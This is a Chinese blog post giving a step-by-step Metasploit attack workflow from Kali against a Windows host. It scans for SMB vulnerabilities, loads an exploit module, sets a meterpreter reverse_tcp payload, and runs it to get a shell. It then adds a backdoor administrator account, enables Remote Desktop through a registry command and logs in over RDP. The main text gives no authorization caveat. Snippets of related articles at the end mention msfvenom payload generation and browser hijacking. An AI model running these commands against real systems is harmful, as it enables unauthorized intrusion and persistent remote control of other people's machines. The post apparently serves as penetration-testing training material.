Kali——metasploit工具渗透测试流程

最新推荐文章于 2024-05-24 10:44:43 发布
最新推荐文章于 2024-05-24 10:44:43 发布
阅读量1k 收藏 16
点赞数 25
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63167128/article/details/136539901
版权

介绍:本文是展示在Kali中通过使用metasploit工具进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。

挂个链接:深信服产业教育中心

常规流程如下:

打开Metasploit工具界面:

1.首先对目标主机进行扫描寻找漏洞

nmap --script smb-vuln xx漏洞名.nse [目标机IP]

示例:

2.启动Metasploit

msfdb init && msfconsole

3.在msf终端下查找相关漏洞模块

search 漏洞名

示例:

4.若metasploit版本过低导致没有针对某操作系统的攻击代码,可以将攻击代码写入/usr/share

/Metasploit-framework/modules/exploits/xx系统/xx协议/xx漏洞名 中

示例:

5.写入攻击代码(视情况写/不写)后重启msf

exit

msfconsole

6.进入模块

use exploit/xx系统/xx协议/xx漏洞名 或者使用use 0 (注:进入模块前务必search一下相关漏洞模块)

7.查看该模块需要设置哪些参数(一般默认即可)

show options

8.设置相关参数

set LHOST IP address //设置本地(攻击者)主机IP地址

set RHOST IP address //设置远程(被攻击者)主机IP地址

set RPOST post //设置目的端口

set payload xx系统/meterpreter/reverse_tcp //设置payload(也称shellcode,攻击载荷,后面接系统目录路径)

9.查找可用目标(查找漏洞能够攻击的相关操作系统,可遍历也可查找自己需要的操作系统进行下一步操作)

show targets

示例:

10.找到相关ID后设置所攻击目标的操作系统类型:

set targets id xx

示例:

11.执行溢出漏洞攻击命令(exploit命令调用了payload)

run/exploit

执行成功后会显示系统路径目录的相关信息(因为调用了payload,而之前payload设置时选择了相关系统目录路径),最后再该相关信息下直接输入shell命令即可拿到目标主机的shell,

示例:

12.创建账号密码,获取的权限够大的话可以将该账号权限提升至管理员权限

比如创建一个cyz用户,密码为123456

net user cyz 123456 /add

提升管理员权限命令:net user cyz 123456 /add && net localgroup administrators cyz /add

13.开启远程登录端口:

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

14.检查是否开启3389端口:

netstat -ano

15.验证该主机是否可以正常远程登录:

重新打开一个kali命令行终端,输入rdesktop IP address:3389来远程登录目标主机

至此测试流程已完成(登不登的上就看情况了~)

示例:

——467
关注
  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 可视化管理实战
悦分享
12-05 954
通过Meterpreter会话成功连接到目标计算机之后,Cortana还可以为我们提供构建自定义菜单的功能。让我们使用Cortana来创建一个自定义键盘记录器,并通过分析以下脚本来了解Cortana脚本的工作机制。
E017-渗透测试常用工具-使用Beef对客户端浏览器进行劫持.pdf
12-02
本文档介绍了一种常用的渗透测试工具——Beef,以及如何利用它对客户端浏览器进行劫持。 Beef(Browser Exploitation Framework)是一个基于Web的渗透测试框架,专门设计用于安全研究人员和渗透测试人员控制和操纵...
【附教程】2024年10款渗透测试人员必备工具Kali Linux+Nmap+Metasploit+Wireshark+Burp Suite+........)
Python栈
02-17 1155
WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。本文主要内容包括:1、Wireshark软件下载和安装以及Wireshark主界面介绍。2、WireShark简单抓包示例。通过该例子学会怎么抓包以及如何简单查看分析数据包内容。3、Wireshark过滤器使用。通过过滤器可以筛选出想要分析的内容。包括按照协议过滤、端口和主机名过滤、数据包内容过滤。
网络安全基础学习】渗透测试工具--Burp Suite详细教程
2301_77472496的博客
07-14 2036
工欲善其事必先利其器。学习网络安全常用的开发软件都在这里了,给大家节省了很多时间。需要的话可以点击这份资源包下载;
kali渗透内网和外网
最新发布
cc123489ll的博客
05-24 649
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
Kali渗透工具 - metasploit
A_Z_dd的博客
06-01 795
初步使用及了解Kali渗透工具 - metasploit
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3179
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
Kali系统学习:弱点扫描工具NMAP实战演示
weixin_55772224的博客
08-25 5401
有关Nmap实战的保姆级演示(内含ExploitDB和searchsploit漏洞查找工具)可以帮助大家快速上手Nmap实战
Kali2虚拟机中工具Metasploit的简单应用
qq_55857040的博客
12-13 4331
实验环境 攻击机:Kali-Linux-2021.2-vmware-amd64 靶机:Win2003 旗舰版 实验过程 一、利用metasploit生成被控端 打开kali窗口,输入命令(注意空格符,复现过程惨痛代价) sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe 这样就是生成成功了 远程控制程序payload.exe(...
利用“Kali Linux”与“Docker”技术进行渗透测试实验.pdf
09-06
在进行渗透测试时,需要选择合适的测试环境和工具Kali Linux 和 Docker 技术可以满足这种需求。 Kali Linux 是一个基于 Debian 的 Linux 发行版,面向专业的渗透测试和安全审计,由国外的“Offensive Security”...
Linux 环境部署脚本,一键配置系统设置,安装常用工具开发环境渗透测试工具等.zip
02-10
5. **渗透测试工具**:在安全测试领域,如Kali Linux中,会包含很多渗透测试工具,如Nmap(网络扫描)、Metasploit(漏洞利用框架)等。这些工具可以通过包管理器安装,或者直接下载源码编译。 6. **自动化执行**:...
kali渗透测试漏洞扫描漏洞破解
02-09
KALI渗透测试之密码破解篇章,详细介绍kali的密码破解工具使用。
kali-linux-2017.3-vm-i386.zip
12-21
Kali Linux中,用户可以找到各种渗透测试工具,如Nmap用于网络扫描,Metasploit用于漏洞利用,Wireshark用于网络抓包分析等。对于安全专业人员、黑客道德测试者和网络安全学习者来说,这是一个非常有价值的资源。...
工业互联网安全测试技术:系统测试.docx
06-24
Kali Linux是一个广泛用于安全测试和渗透测试的Linux发行版,内置了各种安全工具,其中包括Metasploit渗透测试框架。 Metasploit框架是一个由Ruby编程语言构建的开源工具,专门设计用于渗透测试。它具有模块化的...
Metasploit详细教程
Kali与编程
03-24 2162
Metasploit是一种功能强大的漏洞利用工具集,帮助用户测试网络安全并确认可能的漏洞。您可以从Metasploit官方网站下载适用于您操作系统的Metasploit框架。在成功启动Metasploit后,您需要查找目标设备并确定其IP地址、端口号和运行的服务。在选择漏洞后,您需要选择一个可用的模块以利用该漏洞。在选择了模块后,您需要设置所需的参数。该命令将扫描指定IP地址的所有开放端口,并识别运行的服务。该命令将列出所有与Apache相关的已知漏洞。该命令将显示所有可用选项,并允许您设置值。
Kali渗透Metasploit基本使用方法
m0_56988395的博客
02-18 3010
目录 启动 ​ 常用命令 1、核心命令中的connect命令 2、模块相关命令show使用方法 3、模块相关命令search搜索的使用方法 4、模块相关命令use的使用方法 Metaspoit是一个渗透测试平台,能够查找,利用和验证漏洞。 官网:Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 启动 msfconsole 常用命令 1、核心命令中的connect命令.
使用kali系统中的nmap工具扫描漏洞
m0_66712307的博客
11-03 8275
nmap工具扫描网站漏洞
kali linux渗透测试之漏洞扫描
热门推荐
qq_57223070的博客
09-26 1万+
skipfish、nessus、AWVS、nikto的简单使用及功能倾向介绍。
Metasploit的基本使用教程
dianzhao6995的博客
10-16 435
今天给大家带来的是关于Metasploit的基本使用教程,使用到的工具kali linux(命令行模式) 关于Metasploit的发展进程大家自行百度我就不一一赘述了 首先先打开 msfconsole 从图中我们可以看到Metasploit中集成的很多的攻击模块 通过show命令我们可以查看这些模块 下面我们使用Windows的著名漏洞ms10-018(浏览器提...
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上找到下载链接[1]。然后,您需要在VMware Workstation中创建一个新的虚拟机,并将下载的Metasploitable镜像文件导入到虚拟机中。接下来,您可以启动Metasploitable虚拟机,并使用Kali Linux等工具进行渗透测试和漏洞利用的练习[2]。 请注意,渗透测试和漏洞利用是一项合法的活动,但在进行任何形式的渗透测试之前,您必须获得合法的授权,并且只能在授权范围内进行操作。此外,渗透测试应该仅限于您拥有合法权限的系统和网络。在进行任何渗透测试之前,请确保您已经了解并遵守相关的法律和道德准则[3]。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值